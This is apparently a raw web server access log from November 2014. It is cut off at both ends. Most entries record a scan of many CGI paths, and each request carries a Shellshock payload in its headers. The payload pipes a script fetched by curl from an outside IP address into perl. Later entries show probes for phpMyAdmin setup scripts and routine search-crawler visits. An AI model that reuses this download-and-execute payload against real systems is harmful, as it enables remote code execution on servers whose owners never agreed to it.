http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +64.235.231.12 - - [01/Nov/2014:02:23:36 +0200] "GET /webtools/bonsai/cvsblame.cgi HTTP/1.0" 404 466 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +64.235.231.12 - - [01/Nov/2014:02:23:36 +0200] "GET /webtools/bonsai/ccvsblame.cgi HTTP/1.0" 404 467 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +64.235.231.12 - - [01/Nov/2014:02:23:38 +0200] "GET /users/scripts/submit.cgi HTTP/1.0" 404 462 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +64.235.231.12 - - [01/Nov/2014:02:23:38 +0200] "GET /userreg.cgi HTTP/1.0" 404 449 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +64.235.231.12 - - [01/Nov/2014:02:23:39 +0200] "GET /upload.cgi HTTP/1.0" 404 448 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +64.235.231.12 - - [01/Nov/2014:02:23:40 +0200] "GET /test.cgi HTTP/1.0" 404 446 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +64.235.231.12 - - [01/Nov/2014:02:23:42 +0200] "GET /submit.cgi HTTP/1.0" 404 448 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +64.235.231.12 - - [01/Nov/2014:02:23:44 +0200] "GET /site_searcher.cgi HTTP/1.0" 404 455 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +64.235.231.12 - - [01/Nov/2014:02:23:44 +0200] "GET /shop/normal_html.cgi HTTP/1.0" 404 458 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +64.235.231.12 - - [01/Nov/2014:02:23:47 +0200] "GET /setpasswd.cgi HTTP/1.0" 404 451 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +64.235.231.12 - - [01/Nov/2014:02:23:48 +0200] "GET /servers/link.cgi HTTP/1.0" 404 454 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +64.235.231.12 - - [01/Nov/2014:02:23:51 +0200] "GET /sample03.cgi HTTP/1.0" 404 450 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +64.235.231.12 - - [01/Nov/2014:02:23:52 +0200] "GET /sample02.cgi HTTP/1.0" 404 450 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +64.235.231.12 - - [01/Nov/2014:02:23:53 +0200] "GET /sample01.cgi HTTP/1.0" 404 450 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +64.235.231.12 - - [01/Nov/2014:02:23:56 +0200] "GET /quikstore.cgi HTTP/1.0" 404 451 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +64.235.231.12 - - [01/Nov/2014:02:24:08 +0200] "GET /ncbook.cgi HTTP/1.0" 404 448 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +64.235.231.12 - - [01/Nov/2014:02:24:12 +0200] "GET /main.cgi HTTP/1.0" 404 446 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +64.235.231.12 - - [01/Nov/2014:02:24:14 +0200] "GET /left.cgi HTTP/1.0" 404 446 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +64.235.231.12 - - [01/Nov/2014:02:24:29 +0200] "GET /edittag/edittag.cgi HTTP/1.0" 404 457 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +64.235.231.12 - - [01/Nov/2014:02:24:37 +0200] "GET /CSNews.cgi HTTP/1.0" 404 448 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +64.235.231.12 - - [01/Nov/2014:02:24:45 +0200] "GET /cgi-sys/realhelpdesk.cgi HTTP/1.0" 404 462 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +64.235.231.12 - - [01/Nov/2014:02:25:01 +0200] "GET /cgi-bin/whois/whois.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +64.235.231.12 - - [01/Nov/2014:02:25:00 +0200] "GET /cgi-bin/whois_raw.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +64.235.231.12 - - [01/Nov/2014:02:25:05 +0200] "GET /cgi-bin/webmail/html/emumail.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +64.235.231.12 - - [01/Nov/2014:02:25:11 +0200] "GET /cgi-bin/way-board.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +64.235.231.12 - - [01/Nov/2014:02:25:12 +0200] "GET /cgi-bin/w3mman2html.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +64.235.231.12 - - [01/Nov/2014:02:25:12 +0200] "GET /cgi-bin/vpasswd.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +64.235.231.12 - - [01/Nov/2014:02:25:13 +0200] "GET /cgi-bin/vote.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +64.235.231.12 - - [01/Nov/2014:02:25:17 +0200] "GET /cgi-bin/upload.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +64.235.231.12 - - [01/Nov/2014:02:25:19 +0200] "GET /cgi-bin/ttawebtop.cgi/HTTP/1.0" 503 323 "-" "-" +64.235.231.12 - - [01/Nov/2014:02:25:19 +0200] "GET /cgi-bin/troops.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +64.235.231.12 - - [01/Nov/2014:02:25:20 +0200] "GET /cgi-bin/title.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +64.235.231.12 - - [01/Nov/2014:02:25:23 +0200] "GET /cgi-bin/testing_whateverHTTP/1.0" 503 323 "-" "-" +64.235.231.12 - - [01/Nov/2014:02:25:25 +0200] "GET /cgi-bin/test.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +64.235.231.12 - - [01/Nov/2014:02:25:29 +0200] "GET /cgi-bin/survey.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +64.235.231.12 - - [01/Nov/2014:02:25:29 +0200] "GET /cgi-bin/store/index.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +64.235.231.12 - - [01/Nov/2014:02:25:30 +0200] "GET /cgi-bin/store/agora.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +64.235.231.12 - - [01/Nov/2014:02:25:32 +0200] "GET /cgi-bin/start.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +64.235.231.12 - - [01/Nov/2014:02:25:33 +0200] "GET /cgi-bin/sojourn.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +64.235.231.12 - - [01/Nov/2014:02:25:37 +0200] "GET /cgi-bin/smartsearch.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +64.235.231.12 - - [01/Nov/2014:02:25:38 +0200] "GET /cgi-bin/simplestguest.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +64.235.231.12 - - [01/Nov/2014:02:25:42 +0200] "GET /cgi-bin/sendform.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +64.235.231.12 - - [01/Nov/2014:02:25:43 +0200] "GET /cgi-bin/search/search.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +64.235.231.12 - - [01/Nov/2014:02:25:43 +0200] "GET /cgi-bin/search.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +64.235.231.12 - - [01/Nov/2014:02:25:44 +0200] "GET /cgi-bin/searchHTTP/1.0" 503 323 "-" "-" +64.235.231.12 - - [01/Nov/2014:02:25:44 +0200] "GET /cgi-bin/scoadminreg.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +64.235.231.12 - - [01/Nov/2014:02:25:45 +0200] "GET /cgi-bin/robpoll.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +64.235.231.12 - - [01/Nov/2014:02:25:48 +0200] "GET /cgi-bin/replicator/webpage.cgi/HTTP/1.0" 503 323 "-" "-" +64.235.231.12 - - [01/Nov/2014:02:25:50 +0200] "GET /cgi-bin/r.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +64.235.231.12 - - [01/Nov/2014:02:25:51 +0200] "GET /cgi-bin/quizme.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +64.235.231.12 - - [01/Nov/2014:02:25:53 +0200] "GET /cgi-bin/profile.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +64.235.231.12 - - [01/Nov/2014:02:25:54 +0200] "GET /cgi-bin/probecontrol.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +64.235.231.12 - - [01/Nov/2014:02:25:56 +0200] "GET /cgi-bin/postcards.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +64.235.231.12 - - [01/Nov/2014:02:25:56 +0200] "GET /cgi-bin/pollssi.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +64.235.231.12 - - [01/Nov/2014:02:25:59 +0200] "GET /cgi-bin/photo/protected/manage.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +64.235.231.12 - - [01/Nov/2014:02:26:01 +0200] "GET /cgi-bin/pfdisplay.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +64.235.231.12 - - [01/Nov/2014:02:26:02 +0200] "GET /cgi-bin/pfdispaly.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +64.235.231.12 - - [01/Nov/2014:02:26:12 +0200] "GET /cgi-bin/netpad.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +64.235.231.12 - - [01/Nov/2014:02:26:09 +0200] "GET /cgi-bin/nlog-smb.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +64.235.231.12 - - [01/Nov/2014:02:26:14 +0200] "GET /cgi-bin/myguestbook.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +64.235.231.12 - - [01/Nov/2014:02:26:18 +0200] "GET /cgi-bin/mt-static/mt-load.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +64.235.231.12 - - [01/Nov/2014:02:26:21 +0200] "GET /cgi-bin/moin.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +64.235.231.12 - - [01/Nov/2014:02:26:25 +0200] "GET /cgi-bin/main_menu.plHTTP/1.0" 503 323 "-" "-" +64.235.231.12 - - [01/Nov/2014:02:26:34 +0200] "GET /cgi-bin/logit.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +64.235.231.12 - - [01/Nov/2014:02:26:38 +0200] "GET /cgi-bin/journal.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +64.235.231.12 - - [01/Nov/2014:02:26:42 +0200] "GET /cgi-bin/imageFolio.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +64.235.231.12 - - [01/Nov/2014:02:26:48 +0200] "GET /cgi-bin/hsx.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +64.235.231.12 - - [01/Nov/2014:02:27:08 +0200] "GET /cgi-bin/FileSeek2.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +64.235.231.12 - - [01/Nov/2014:02:27:08 +0200] "GET /cgi-bin/FileSeek.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +64.235.231.12 - - [01/Nov/2014:02:27:11 +0200] "GET /cgi-bin/ezshopper2/loadpage.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +64.235.231.12 - - [01/Nov/2014:02:27:18 +0200] "GET /cgi-bin/emumail/emumail.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +64.235.231.12 - - [01/Nov/2014:02:27:20 +0200] "GET /cgi-bin/emu/html/emumail.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +64.235.231.12 - - [01/Nov/2014:02:27:19 +0200] "GET /cgi-bin/emumail.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +64.235.231.12 - - [01/Nov/2014:02:27:24 +0200] "GET /cgi-bin/diagnose.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +64.235.231.12 - - [01/Nov/2014:02:27:28 +0200] "GET /cgi-bin/dbman/db.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +64.235.231.12 - - [01/Nov/2014:02:27:29 +0200] "GET /cgi-bin/day5datanotifier.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +64.235.231.12 - - [01/Nov/2014:02:27:34 +0200] "GET /cgi-bin/cvsblame.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +64.235.231.12 - - [01/Nov/2014:02:27:36 +0200] "GET /cgi-bin/csPassword/csPassword.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +64.235.231.12 - - [01/Nov/2014:02:27:36 +0200] "GET /cgi-bin/csPassword.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +64.235.231.12 - - [01/Nov/2014:02:27:37 +0200] "GET /cgi-bin/csNewsPro.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +64.235.231.12 - - [01/Nov/2014:02:27:41 +0200] "GET /cgi-bin/csGuestBook.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +64.235.231.12 - - [01/Nov/2014:02:27:44 +0200] "GET /cgi-bin/compatible.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +64.235.231.12 - - [01/Nov/2014:02:27:44 +0200] "GET /cgi-bin/common/listrec.plHTTP/1.0" 503 323 "-" "-" +64.235.231.12 - - [01/Nov/2014:02:27:50 +0200] "GET /cgi-bin/classified.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +64.235.231.12 - - [01/Nov/2014:02:27:51 +0200] "GET /cgi-bin/cgi.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +64.235.231.12 - - [01/Nov/2014:02:27:54 +0200] "GET /cgi-bin/cbmc/forums.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +64.235.231.12 - - [01/Nov/2014:02:27:57 +0200] "GET /cgi-bin/cachemgr.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +64.235.231.12 - - [01/Nov/2014:02:27:59 +0200] "GET /cgi-bin/bulk/bulk.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +64.235.231.12 - - [01/Nov/2014:02:27:59 +0200] "GET /cgi-bin/build.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +64.235.231.12 - - [01/Nov/2014:02:28:10 +0200] "GET /cgi-bin/BBS/bbs_forum.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +64.235.231.12 - - [01/Nov/2014:02:28:21 +0200] "GET /cgi-bin/ax-admin.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +64.235.231.12 - - [01/Nov/2014:02:28:22 +0200] "GET /cgi-bin/auktion.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +64.235.231.12 - - [01/Nov/2014:02:28:31 +0200] "GET /cgi-bin/adminwww.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +64.235.231.12 - - [01/Nov/2014:02:28:33 +0200] "GET /cgi-bin/admin/setup.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +64.235.231.12 - - [01/Nov/2014:02:28:36 +0200] "GET /cgi-bin/admin.plHTTP/1.0" 503 323 "-" "-" +64.235.231.12 - - [01/Nov/2014:02:28:49 +0200] "GET /cgi-bin/.cobalt/alert/service.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +64.235.231.12 - - [01/Nov/2014:02:29:03 +0200] "GET /admin.cgi HTTP/1.0" 404 447 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +123.125.71.96 - - [01/Nov/2014:03:07:11 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +220.181.108.184 - - [01/Nov/2014:03:08:12 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +137.116.240.150 - - [01/Nov/2014:03:18:31 +0200] "GET / HTTP/1.1" 200 453 "-" "-" +137.116.240.150 - - [01/Nov/2014:03:18:32 +0200] "OPTIONS / HTTP/1.1" 200 204 "-" "-" +137.116.240.150 - - [01/Nov/2014:03:18:32 +0200] "GET /Robots.txt HTTP/1.1" 404 411 "-" "-" +137.116.240.150 - - [01/Nov/2014:03:18:32 +0200] "GET /SiteMap.xml HTTP/1.1" 404 412 "-" "-" +137.116.240.150 - - [01/Nov/2014:03:18:32 +0200] "POST / HTTP/1.1" 200 453 "-" "-" +123.125.71.95 - - [01/Nov/2014:04:16:40 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +220.181.108.161 - - [01/Nov/2014:04:17:47 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +220.181.108.159 - - [01/Nov/2014:05:26:30 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +123.125.71.88 - - [01/Nov/2014:06:23:26 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +220.181.108.171 - - [01/Nov/2014:06:24:48 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +203.114.105.43 - - [01/Nov/2014:06:57:38 +0200] "GET /vnvn/vnv/vn.php HTTP/1.1" 404 416 "-" "-" +203.114.105.43 - - [01/Nov/2014:06:57:39 +0200] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 429 "-" "-" +203.114.105.43 - - [01/Nov/2014:06:57:40 +0200] "GET /pma/scripts/setup.php HTTP/1.1" 404 422 "-" "-" +203.114.105.43 - - [01/Nov/2014:06:57:41 +0200] "GET /myadmin/scripts/setup.php HTTP/1.1" 404 426 "-" "-" +123.125.71.101 - - [01/Nov/2014:07:04:43 +0200] "GET /ftp/public/pictures/gallery/raatihuone_small.jpg HTTP/1.1" 200 113011 "http://image.baidu.com/i?ct=503316480&z=0&tn=baiduimagedetail" "Baiduspider-image+(+http://www.baidu.com/search/spider.htm)" +123.125.71.105 - - [01/Nov/2014:07:16:59 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +220.181.108.149 - - [01/Nov/2014:07:17:19 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +59.124.2.157 - - [01/Nov/2014:07:46:12 +0200] "GET /sasa/sas/sa.php HTTP/1.1" 404 416 "-" "-" +59.124.2.157 - - [01/Nov/2014:07:46:13 +0200] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 429 "-" "-" +59.124.2.157 - - [01/Nov/2014:07:46:14 +0200] "GET /pma/scripts/setup.php HTTP/1.1" 404 422 "-" "-" +59.124.2.157 - - [01/Nov/2014:07:46:15 +0200] "GET /myadmin/scripts/setup.php HTTP/1.1" 404 426 "-" "-" +116.55.241.41 - - [01/Nov/2014:07:52:24 +0200] "GET /veve/vev/ve.php HTTP/1.1" 404 416 "-" "-" +116.55.241.41 - - [01/Nov/2014:07:52:25 +0200] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 429 "-" "-" +116.55.241.41 - - [01/Nov/2014:07:52:27 +0200] "GET /pma/scripts/setup.php HTTP/1.1" 404 422 "-" "-" +116.55.241.41 - - [01/Nov/2014:07:52:28 +0200] "GET /myadmin/scripts/setup.php HTTP/1.1" 404 426 "-" "-" +123.125.71.111 - - [01/Nov/2014:08:11:00 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +220.181.108.174 - - [01/Nov/2014:08:11:57 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +123.125.71.56 - - [01/Nov/2014:09:06:10 +0200] "GET /robots.txt HTTP/1.1" 404 409 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +123.125.71.92 - - [01/Nov/2014:09:08:20 +0200] "GET / HTTP/1.1" 200 453 "-" 